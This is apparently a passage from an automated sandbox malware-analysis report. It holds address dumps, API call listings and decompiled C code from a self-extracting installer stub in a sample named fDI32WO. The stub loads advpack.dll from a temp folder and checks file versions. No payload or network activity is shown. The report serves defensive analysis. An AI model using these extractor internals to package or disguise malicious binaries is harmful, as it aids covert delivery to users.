                                                                                                                                                                                                                                              0x00a837cb
                                                                                                                                                                                                                                              0x00a837cd
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a837d5
                                                                                                                                                                                                                                              0x00a837db
                                                                                                                                                                                                                                              0x00a837e8
                                                                                                                                                                                                                                              0x00a837ea
                                                                                                                                                                                                                                              0x00a837ea
                                                                                                                                                                                                                                              0x00a837ea
                                                                                                                                                                                                                                              0x00a837f0
                                                                                                                                                                                                                                              0x00a837f6
                                                                                                                                                                                                                                              0x00a83805
                                                                                                                                                                                                                                              0x00a83817
                                                                                                                                                                                                                                              0x00a8382b
                                                                                                                                                                                                                                              0x00a83830
                                                                                                                                                                                                                                              0x00a83836
                                                                                                                                                                                                                                              0x00a8383b
                                                                                                                                                                                                                                              0x00a8383d
                                                                                                                                                                                                                                              0x00a838eb
                                                                                                                                                                                                                                              0x00a838eb
                                                                                                                                                                                                                                              0x00a838f2
                                                                                                                                                                                                                                              0x00a8390c
                                                                                                                                                                                                                                              0x00a83911
                                                                                                                                                                                                                                              0x00a83911
                                                                                                                                                                                                                                              0x00a83913
                                                                                                                                                                                                                                              0x00a8394d
                                                                                                                                                                                                                                              0x00a8394d
                                                                                                                                                                                                                                              0x00a8394f
                                                                                                                                                                                                                                              0x00a838a9
                                                                                                                                                                                                                                              0x00a838a9
                                                                                                                                                                                                                                              0x00a838b0
                                                                                                                                                                                                                                              0x00a838b2
                                                                                                                                                                                                                                              0x00a838b9
                                                                                                                                                                                                                                              0x00a838bb
                                                                                                                                                                                                                                              0x00a838c1
                                                                                                                                                                                                                                              0x00a83975
                                                                                                                                                                                                                                              0x00a838c7
                                                                                                                                                                                                                                              0x00a838de
                                                                                                                                                                                                                                              0x00a838e0
                                                                                                                                                                                                                                              0x00a838e0
                                                                                                                                                                                                                                              0x00a8397b
                                                                                                                                                                                                                                              0x00a8397d
                                                                                                                                                                                                                                              0x00a839a9
                                                                                                                                                                                                                                              0x00a8397f
                                                                                                                                                                                                                                              0x00a83982
                                                                                                                                                                                                                                              0x00a8398b
                                                                                                                                                                                                                                              0x00a8398d
                                                                                                                                                                                                                                              0x00a8398f
                                                                                                                                                                                                                                              0x00a8399f
                                                                                                                                                                                                                                              0x00a839a1
                                                                                                                                                                                                                                              0x00a83991
                                                                                                                                                                                                                                              0x00a83991
                                                                                                                                                                                                                                              0x00a83991
                                                                                                                                                                                                                                              0x00a8398f
                                                                                                                                                                                                                                              0x00a839af
                                                                                                                                                                                                                                              0x00a839b6
                                                                                                                                                                                                                                              0x00a83a0f
                                                                                                                                                                                                                                              0x00a83a0f
                                                                                                                                                                                                                                              0x00a83a11
                                                                                                                                                                                                                                              0x00a83a13
                                                                                                                                                                                                                                              0x00a83a19
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a839b8
                                                                                                                                                                                                                                              0x00a839b8
                                                                                                                                                                                                                                              0x00a839ba
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a839bc
                                                                                                                                                                                                                                              0x00a839bf
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a839c3
                                                                                                                                                                                                                                              0x00a839c9
                                                                                                                                                                                                                                              0x00a839ce
                                                                                                                                                                                                                                              0x00a839d0
                                                                                                                                                                                                                                              0x00a839e3
                                                                                                                                                                                                                                              0x00a839e5
                                                                                                                                                                                                                                              0x00a839e6
                                                                                                                                                                                                                                              0x00a839f1
                                                                                                                                                                                                                                              0x00a839f7
                                                                                                                                                                                                                                              0x00a839fa
                                                                                                                                                                                                                                              0x00a83a01
                                                                                                                                                                                                                                              0x00a83a04
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83a06
                                                                                                                                                                                                                                              0x00a83a09
                                                                                                                                                                                                                                              0x00a83a09
                                                                                                                                                                                                                                              0x00a83a0b
                                                                                                                                                                                                                                              0x00a83a0b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83a09
                                                                                                                                                                                                                                              0x00a839fc
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a839fc
                                                                                                                                                                                                                                              0x00a839d3
                                                                                                                                                                                                                                              0x00a839d8
                                                                                                                                                                                                                                              0x00a839da
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a839dc
                                                                                                                                                                                                                                              0x00a839b6
                                                                                                                                                                                                                                              0x00a83955
                                                                                                                                                                                                                                              0x00a8395b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83961
                                                                                                                                                                                                                                              0x00a83963
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83969
                                                                                                                                                                                                                                              0x00a83969
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83969
                                                                                                                                                                                                                                              0x00a83915
                                                                                                                                                                                                                                              0x00a83915
                                                                                                                                                                                                                                              0x00a8391b
                                                                                                                                                                                                                                              0x00a8391f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8392d
                                                                                                                                                                                                                                              0x00a83933
                                                                                                                                                                                                                                              0x00a83938
                                                                                                                                                                                                                                              0x00a8393a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83940
                                                                                                                                                                                                                                              0x00a83946
                                                                                                                                                                                                                                              0x00a8394b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8394b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a838f2
                                                                                                                                                                                                                                              0x00a83843
                                                                                                                                                                                                                                              0x00a83845
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8384b
                                                                                                                                                                                                                                              0x00a8384d
                                                                                                                                                                                                                                              0x00a83883
                                                                                                                                                                                                                                              0x00a83885
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8389a
                                                                                                                                                                                                                                              0x00a8389e
                                                                                                                                                                                                                                              0x00a8389e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a838a0
                                                                                                                                                                                                                                              0x00a838a0
                                                                                                                                                                                                                                              0x00a838a2
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a838a4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a838a4
                                                                                                                                                                                                                                              0x00a8384f
                                                                                                                                                                                                                                              0x00a83851
                                                                                                                                                                                                                                              0x00a83857
                                                                                                                                                                                                                                              0x00a8386e
                                                                                                                                                                                                                                              0x00a83877
                                                                                                                                                                                                                                              0x00a8387b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83881
                                                                                                                                                                                                                                              0x00a83859
                                                                                                                                                                                                                                              0x00a8385c
                                                                                                                                                                                                                                              0x00a83862
                                                                                                                                                                                                                                              0x00a83866
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83868
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a838f4
                                                                                                                                                                                                                                              0x00a838f4
                                                                                                                                                                                                                                              0x00a838f5
                                                                                                                                                                                                                                              0x00a838fb
                                                                                                                                                                                                                                              0x00a83901
                                                                                                                                                                                                                                              0x00a83901
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8390a
                                                                                                                                                                                                                                              0x00a8374b
                                                                                                                                                                                                                                              0x00a8374e
                                                                                                                                                                                                                                              0x00a8375c
                                                                                                                                                                                                                                              0x00a83764
                                                                                                                                                                                                                                              0x00a83769
                                                                                                                                                                                                                                              0x00a8376e
                                                                                                                                                                                                                                              0x00a83771
                                                                                                                                                                                                                                              0x00a8379c
                                                                                                                                                                                                                                              0x00a8379f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a837a3
                                                                                                                                                                                                                                              0x00a837a4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a837a4
                                                                                                                                                                                                                                              0x00a83773
                                                                                                                                                                                                                                              0x00a83777
                                                                                                                                                                                                                                              0x00a83778
                                                                                                                                                                                                                                              0x00a8377f
                                                                                                                                                                                                                                              0x00a83781
                                                                                                                                                                                                                                              0x00a8378e
                                                                                                                                                                                                                                              0x00a8378e
                                                                                                                                                                                                                                              0x00a83794
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83794
                                                                                                                                                                                                                                              0x00a83783
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83785
                                                                                                                                                                                                                                              0x00a8378c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8378c
                                                                                                                                                                                                                                              0x00a83750
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8372d
                                                                                                                                                                                                                                              0x00a8372d
                                                                                                                                                                                                                                              0x00a8396b
                                                                                                                                                                                                                                              0x00a8396b
                                                                                                                                                                                                                                              0x00a8396c
                                                                                                                                                                                                                                              0x00a8396e
                                                                                                                                                                                                                                              0x00a8396f
                                                                                                                                                                                                                                              0x00a83a1e
                                                                                                                                                                                                                                              0x00a83a1e
                                                                                                                                                                                                                                              0x00a83a22
                                                                                                                                                                                                                                              0x00a83a27
                                                                                                                                                                                                                                              0x00a83a3e
                                                                                                                                                                                                                                              0x00a83a3e

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00A83723
                                                                                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 00A839C3
                                                                                                                                                                                                                                              • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 00A839F1
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$BeepVersion
                                                                                                                                                                                                                                              • String ID: 3$lenta
                                                                                                                                                                                                                                              • API String ID: 2519184315-4216304122
                                                                                                                                                                                                                                              • Opcode ID: 7c8ee21dcb89fdb0ad7579014d777c299cd4d13391027b6dc821525e34d6e175
                                                                                                                                                                                                                                              • Instruction ID: ad1c62637d39ffbe07298ce1b2376c7eb045ac26294dc5bea1436b0cca1a287a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c8ee21dcb89fdb0ad7579014d777c299cd4d13391027b6dc821525e34d6e175
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E911472E012149FEF38EF25CD907BAB3B1EB45B40F1541A9D88AAB241DB758F81CB41
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                                                                                                              			E00A86495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				signed char _t14;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                                              				void* _t18;
                                                                                                                                                                                                                                              				CHAR* _t26;
                                                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t27 = __esi;
                                                                                                                                                                                                                                              				_t18 = __ebx;
                                                                                                                                                                                                                                              				_t9 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				E00A81781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                              				_t26 = "advpack.dll";
                                                                                                                                                                                                                                              				E00A8658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                                                              				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                              				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                                                              					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                                                              			}













                                                                                                                                                                                                                                              0x00a86495
                                                                                                                                                                                                                                              0x00a86495
                                                                                                                                                                                                                                              0x00a864a0
                                                                                                                                                                                                                                              0x00a864a7
                                                                                                                                                                                                                                              0x00a864ab
                                                                                                                                                                                                                                              0x00a864bd
                                                                                                                                                                                                                                              0x00a864c2
                                                                                                                                                                                                                                              0x00a864d3
                                                                                                                                                                                                                                              0x00a864df
                                                                                                                                                                                                                                              0x00a864e8
                                                                                                                                                                                                                                              0x00a86502
                                                                                                                                                                                                                                              0x00a864ee
                                                                                                                                                                                                                                              0x00a864f9
                                                                                                                                                                                                                                              0x00a864f9
                                                                                                                                                                                                                                              0x00a86516

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00A864DF
                                                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00A864F9
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00A86502
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$advpack.dll
                                                                                                                                                                                                                                              • API String ID: 438848745-3736221019
                                                                                                                                                                                                                                              • Opcode ID: 820fb225a9d51df1fe76e7afea2aea645f5cbe083e38018706b8f2129f8531ad
                                                                                                                                                                                                                                              • Instruction ID: 2231e535ae3a12e1fd02078febd45d1df90aca3f0e0aa607d7688e11eade5145
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 820fb225a9d51df1fe76e7afea2aea645f5cbe083e38018706b8f2129f8531ad
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9101F470A04108ABEB54FBA4DC49EEE7778EB60311F500299F585921C0DF74AE8BCB52
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A828E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				char* _v12;
                                                                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                                                                              				void* _v20;
                                                                                                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                                                                                                              				int _v28;
                                                                                                                                                                                                                                              				int _v32;
                                                                                                                                                                                                                                              				void* _v36;
                                                                                                                                                                                                                                              				int _v40;
                                                                                                                                                                                                                                              				void* _v44;
                                                                                                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                                                                                                              				intOrPtr _v64;
                                                                                                                                                                                                                                              				long _t68;
                                                                                                                                                                                                                                              				void* _t70;
                                                                                                                                                                                                                                              				void* _t73;
                                                                                                                                                                                                                                              				void* _t79;
                                                                                                                                                                                                                                              				void* _t83;
                                                                                                                                                                                                                                              				void* _t87;
                                                                                                                                                                                                                                              				void* _t88;
                                                                                                                                                                                                                                              				intOrPtr _t93;
                                                                                                                                                                                                                                              				intOrPtr _t97;
                                                                                                                                                                                                                                              				intOrPtr _t99;
                                                                                                                                                                                                                                              				int _t101;
                                                                                                                                                                                                                                              				void* _t103;
                                                                                                                                                                                                                                              				void* _t106;
                                                                                                                                                                                                                                              				void* _t109;
                                                                                                                                                                                                                                              				void* _t110;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                                                                              				_t99 = __ecx;
                                                                                                                                                                                                                                              				_t106 = 0;
                                                                                                                                                                                                                                              				_v16 = __ecx;
                                                                                                                                                                                                                                              				_t87 = 0;
                                                                                                                                                                                                                                              				_t103 = 0;
                                                                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                                                                              				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                              					L19:
                                                                                                                                                                                                                                              					_t106 = 1;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t62 = 0;
                                                                                                                                                                                                                                              					_v8 = 0;
                                                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                                                              						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                              						if(E00A82773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                              							goto L20;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                                                              						_v28 = _t68;
                                                                                                                                                                                                                                              						if(_t68 == 0) {
                                                                                                                                                                                                                                              							_t99 = _v16;
                                                                                                                                                                                                                                              							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                              							_t93 = _v24;
                                                                                                                                                                                                                                              							_t87 = _v20;
                                                                                                                                                                                                                                              							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                              								goto L18;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                              							if(_t103 != 0) {
                                                                                                                                                                                                                                              								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                              								_v36 = _t73;
                                                                                                                                                                                                                                              								if(_t73 != 0) {
                                                                                                                                                                                                                                              									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                              										L15:
                                                                                                                                                                                                                                              										GlobalUnlock(_t103);
                                                                                                                                                                                                                                              										_t99 = _v16;
                                                                                                                                                                                                                                              										L18:
                                                                                                                                                                                                                                              										_t87 = _t87 + 1;
                                                                                                                                                                                                                                              										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                              										_v20 = _t87;
                                                                                                                                                                                                                                              										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                              										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                              											continue;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											goto L19;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t79 = _v44;
                                                                                                                                                                                                                                              										_t88 = _t106;
                                                                                                                                                                                                                                              										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                              										_t101 = _v28;
                                                                                                                                                                                                                                              										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                              										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                              										_t97 = _v48;
                                                                                                                                                                                                                                              										_v36 = _t83;
                                                                                                                                                                                                                                              										_t109 = _t83;
                                                                                                                                                                                                                                              										do {
                                                                                                                                                                                                                                              											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00A82A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                              											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00A82A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                              											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                              											_t88 = _t88 + 4;
                                                                                                                                                                                                                                              										} while (_t88 < 8);
                                                                                                                                                                                                                                              										_t87 = _v20;
                                                                                                                                                                                                                                              										_t106 = 0;
                                                                                                                                                                                                                                              										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                              											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                              												GlobalUnlock(_t103);
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												goto L15;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											goto L15;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L20;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				L20:
                                                                                                                                                                                                                                              				 *_a8 = _t87;
                                                                                                                                                                                                                                              				if(_t103 != 0) {
                                                                                                                                                                                                                                              					GlobalFree(_t103);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t106;
                                                                                                                                                                                                                                              			}

































                                                                                                                                                                                                                                              0x00a828f1
                                                                                                                                                                                                                                              0x00a828f4
                                                                                                                                                                                                                                              0x00a828f7
                                                                                                                                                                                                                                              0x00a828f9
                                                                                                                                                                                                                                              0x00a828fc
                                                                                                                                                                                                                                              0x00a828ff
                                                                                                                                                                                                                                              0x00a82901
                                                                                                                                                                                                                                              0x00a82907
                                                                                                                                                                                                                                              0x00a82a62
                                                                                                                                                                                                                                              0x00a82a64
                                                                                                                                                                                                                                              0x00a8290d
                                                                                                                                                                                                                                              0x00a8290d
                                                                                                                                                                                                                                              0x00a8290f
                                                                                                                                                                                                                                              0x00a82912
                                                                                                                                                                                                                                              0x00a82920
                                                                                                                                                                                                                                              0x00a82937
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82944
                                                                                                                                                                                                                                              0x00a8294a
                                                                                                                                                                                                                                              0x00a8294f
                                                                                                                                                                                                                                              0x00a82a2f
                                                                                                                                                                                                                                              0x00a82a32
                                                                                                                                                                                                                                              0x00a82a34
                                                                                                                                                                                                                                              0x00a82a37
                                                                                                                                                                                                                                              0x00a82a41
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82955
                                                                                                                                                                                                                                              0x00a8295e
                                                                                                                                                                                                                                              0x00a82962
                                                                                                                                                                                                                                              0x00a82969
                                                                                                                                                                                                                                              0x00a8296f
                                                                                                                                                                                                                                              0x00a82974
                                                                                                                                                                                                                                              0x00a8298c
                                                                                                                                                                                                                                              0x00a82a20
                                                                                                                                                                                                                                              0x00a82a21
                                                                                                                                                                                                                                              0x00a82a27
                                                                                                                                                                                                                                              0x00a82a4c
                                                                                                                                                                                                                                              0x00a82a4f
                                                                                                                                                                                                                                              0x00a82a50
                                                                                                                                                                                                                                              0x00a82a53
                                                                                                                                                                                                                                              0x00a82a56
                                                                                                                                                                                                                                              0x00a82a5c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a829b2
                                                                                                                                                                                                                                              0x00a829b2
                                                                                                                                                                                                                                              0x00a829b5
                                                                                                                                                                                                                                              0x00a829bd
                                                                                                                                                                                                                                              0x00a829c3
                                                                                                                                                                                                                                              0x00a829cc
                                                                                                                                                                                                                                              0x00a829d5
                                                                                                                                                                                                                                              0x00a829d7
                                                                                                                                                                                                                                              0x00a829da
                                                                                                                                                                                                                                              0x00a829dd
                                                                                                                                                                                                                                              0x00a829df
                                                                                                                                                                                                                                              0x00a829ec
                                                                                                                                                                                                                                              0x00a829f8
                                                                                                                                                                                                                                              0x00a829fc
                                                                                                                                                                                                                                              0x00a829ff
                                                                                                                                                                                                                                              0x00a82a02
                                                                                                                                                                                                                                              0x00a82a07
                                                                                                                                                                                                                                              0x00a82a0a
                                                                                                                                                                                                                                              0x00a82a0f
                                                                                                                                                                                                                                              0x00a82a19
                                                                                                                                                                                                                                              0x00a82a81
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82a0f
                                                                                                                                                                                                                                              0x00a8298c
                                                                                                                                                                                                                                              0x00a82974
                                                                                                                                                                                                                                              0x00a82962
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8294f
                                                                                                                                                                                                                                              0x00a82912
                                                                                                                                                                                                                                              0x00a82a65
                                                                                                                                                                                                                                              0x00a82a68
                                                                                                                                                                                                                                              0x00a82a6c
                                                                                                                                                                                                                                              0x00a82a6f
                                                                                                                                                                                                                                              0x00a82a6f
                                                                                                                                                                                                                                              0x00a82a7d

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 00A82A6F
                                                                                                                                                                                                                                                • Part of subcall function 00A82773: CharUpperA.USER32(D891196D,00000000,00000000,00000000), ref: 00A827A8
                                                                                                                                                                                                                                                • Part of subcall function 00A82773: CharNextA.USER32(0000054D), ref: 00A827B5
                                                                                                                                                                                                                                                • Part of subcall function 00A82773: CharNextA.USER32(00000000), ref: 00A827BC
                                                                                                                                                                                                                                                • Part of subcall function 00A82773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A82829
                                                                                                                                                                                                                                                • Part of subcall function 00A82773: RegQueryValueExA.ADVAPI32(?,00A81140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A82852
                                                                                                                                                                                                                                                • Part of subcall function 00A82773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A82870
                                                                                                                                                                                                                                                • Part of subcall function 00A82773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A828A0
                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00A83938,?,?,?,?,-00000005), ref: 00A82958
